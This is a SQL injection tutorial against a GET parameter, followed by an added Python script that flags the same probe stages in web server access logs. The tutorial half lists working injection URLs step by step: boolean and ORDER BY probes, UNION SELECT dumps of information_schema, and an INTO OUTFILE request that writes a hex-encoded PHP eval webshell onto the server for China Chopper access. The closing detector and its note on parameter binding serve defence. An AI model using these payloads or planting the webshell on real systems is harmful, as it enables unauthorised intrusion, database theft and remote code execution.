A site with a GET parameter whose value is used to return data from a database:
http://127.0.0.1/index.php?id=1
The following requests can be tried to check whether an injection point exists:
http://127.0.0.1/index.php?id=1 and 1=1
http://127.0.0.1/index.php?id=1 and 1=2
http://127.0.0.1/index.php?id=1'order by 1%23
http://127.0.0.1/index.php?id=1'order by 2%23
...incrementing the column number until the page returns an error.
http://127.0.0.1/index.php?id=1' and 1=2 union select 1,2,3 %23
Column 2 is the one echoed back on the page.
http://127.0.0.1/index.php?id=1' and 1=2 union select 1,user(),3 %23
Check the current database account and its privileges.
Dump the database names:
http://127.0.0.1/index.php?id=1' and 1=2 union select 1,group_concat(distinct schema_name),3 from information_schema.schemata %23
Dump the table names:
http://127.0.0.1/index.php?id=1' and 1=2 union select 1,group_concat(distinct table_name),3 from information_schema.tables where table_schema=database()%23
Dump the column names:
http://127.0.0.1/index.php?id=1' and 1=2 union select 1,group_concat(distinct column_name),3 from information_schema.columns where table_schema=database() and table_name=0x6269616f6d696e67%23
Note:
0x6269616f6d696e67 is the table name in hexadecimal;
the Firefox HackBar add-on can do this conversion directly.
http://127.0.0.1/index.php?id=1' and 1=2 union select 1,group_concat(distinct ziduan_name),3 from table_name%23
Note:
ziduan_name is the name of the column to query;
table_name is the name of the table.
Using the GET injection to write a one-line webshell:
http://127.0.0.1/index.php?id=1' and 1=2 union select 1,0x3c3f70687020406576616c28245f504f53545b3132335d293b3f3e,3 into outfile 'C:\\WWW\\shell.php'%23
Note:
0x3c3f70687020406576616c28245f504f53545b3132335d293b3f3e is <?php @eval($_POST[123]);?> in hexadecimal;
C:\WWW\shell.php is the absolute path on the server.
Then connect to it with Caidao (China Chopper).
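Every step of the sequence above goes through the same GET parameter, so the probes stand out in web server access logs. The following is an added detection example (not part of the original write-up and not the target site's code) that URL-decodes each request's parameters and tags it with the stage it belongs to, from the boolean 1=1/1=2 check through ORDER BY enumeration, UNION SELECT against information_schema, and INTO OUTFILE; the log lines and client addresses are constructed sample data.

```python
import re
from typing import Dict, Iterable, Iterator, List, Tuple
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Each stage of the probe sequence leaves a distinct token in the GET parameter; listed most severe first.
STAGES = [
    ("into_outfile",   re.compile(r"\binto\s+(?:out|dump)file\b", re.I)),
    ("schema_enum",    re.compile(r"\binformation_schema\.", re.I)),
    ("union_select",   re.compile(r"\bunion\b.*\bselect\b", re.I | re.S)),
    ("order_by_probe", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("boolean_probe",  re.compile(r"\band\s+\d+\s*=\s*\d+", re.I)),
]
# Common Log Format request line; only the fields the detector needs are captured.
LOG_LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3})')
# Constructed sample log mirroring the request sequence in the write-up (payload hex replaced by 0x41414141).
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?id=1 HTTP/1.1" 200 512',
    '10.0.0.5 - - [10/Oct/2023:13:55:40 +0000] "GET /index.php?id=1%20and%201=2 HTTP/1.1" 200 88',
    '10.0.0.5 - - [10/Oct/2023:13:55:44 +0000] "GET /index.php?id=1%27order%20by%203%23 HTTP/1.1" 500 0',
    '10.0.0.5 - - [10/Oct/2023:13:55:50 +0000] "GET /index.php?id=1%27%20and%201=2%20union%20select%201,group_concat(distinct%20schema_name),3%20from%20information_schema.schemata%20%23 HTTP/1.1" 200 640',
    '10.0.0.5 - - [10/Oct/2023:13:56:02 +0000] "GET /index.php?id=1%27%20and%201=2%20union%20select%201,0x41414141,3%20into%20outfile%20%27C:%5C%5CWWW%5C%5Cshell.php%27%23 HTTP/1.1" 200 0',
    '10.0.0.9 - - [10/Oct/2023:13:56:10 +0000] "GET /index.php?id=42 HTTP/1.1" 200 512',
]

def classify_request(path: str) -> List[str]:
    """Return the stage names whose pattern matches any URL-decoded GET parameter value."""
    hits: List[str] = []
    for _name, value in parse_qsl(urlsplit(path).query, keep_blank_values=True):
        decoded = unquote_plus(value)  # parse_qsl decodes once; this also catches double encoding
        for stage, pattern in STAGES:
            if stage not in hits and pattern.search(decoded):
                hits.append(stage)
    return hits

def scan_log(lines: Iterable[str]) -> Iterator[Tuple[str, str, List[str]]]:
    """Yield (client_ip, request_path, stages) for every request matching at least one stage."""
    for line in lines:
        m = LOG_LINE.match(line)
        stages = classify_request(m["path"]) if m else []
        if stages:
            yield m["ip"], m["path"], stages

def summarize(lines: Iterable[str]) -> Dict[str, List[str]]:
    """Map each client IP to the stages seen from it, in order of first appearance."""
    seen: Dict[str, List[str]] = {}
    for ip, _path, stages in scan_log(lines):
        bucket = seen.setdefault(ip, [])
        for stage in stages:
            if stage not in bucket:
                bucket.append(stage)
    return seen
```

A single client walking through several stages in sequence, as in the summary for 10.0.0.5 here, is a stronger signal than any one pattern on its own; the fix on the server side remains binding id as a parameter rather than concatenating it into the query.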